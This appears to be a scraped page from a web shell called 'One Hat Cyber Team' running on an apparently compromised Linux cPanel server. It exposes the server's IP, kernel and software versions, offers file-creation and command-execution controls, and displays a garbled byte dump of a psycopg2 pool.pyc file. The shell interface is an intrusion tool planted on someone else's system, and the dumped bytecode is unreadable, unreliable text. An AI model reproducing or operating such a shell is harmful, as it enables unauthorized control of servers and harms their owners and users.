⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib64
/
python2.7
/
site-packages
/
psycopg2
/
View File Name :
pool.pyc
� 0��Qc @ s� d Z d d l Z d d l j Z d e j f d � � YZ d e f d � � YZ d e f d � � YZ d e f d � � YZ d e f d � � YZ d S( s` Connection pooling for psycopg2 This module implements thread-safe (and not) connection pools. i����Nt PoolErrorc B s e Z RS( ( t __name__t __module__( ( ( s3 /usr/lib64/python2.7/site-packages/psycopg2/pool.pyR s t AbstractConnectionPoolc B sP e Z d Z d � Z d d � Z d � Z d d � Z d e d � Z d � Z RS( s Generic key-based pooling code.c O sy | | _ | | _ t | _ | | _ | | _ g | _ i | _ i | _ d | _ x! t | j � D] } | j � qa Wd S( s� Initialize the connection pool. New 'minconn' connections are created immediately calling 'connfunc' with given parameters. The connection pool will support a maximum of about 'maxconn' connections. i N( t minconnt maxconnt Falset closedt _argst _kwargst _poolt _usedt _rusedt _keyst ranget _connect( t selfR R t argst kwargst i( ( s3 /usr/lib64/python2.7/site-packages/psycopg2/pool.pyt __init__&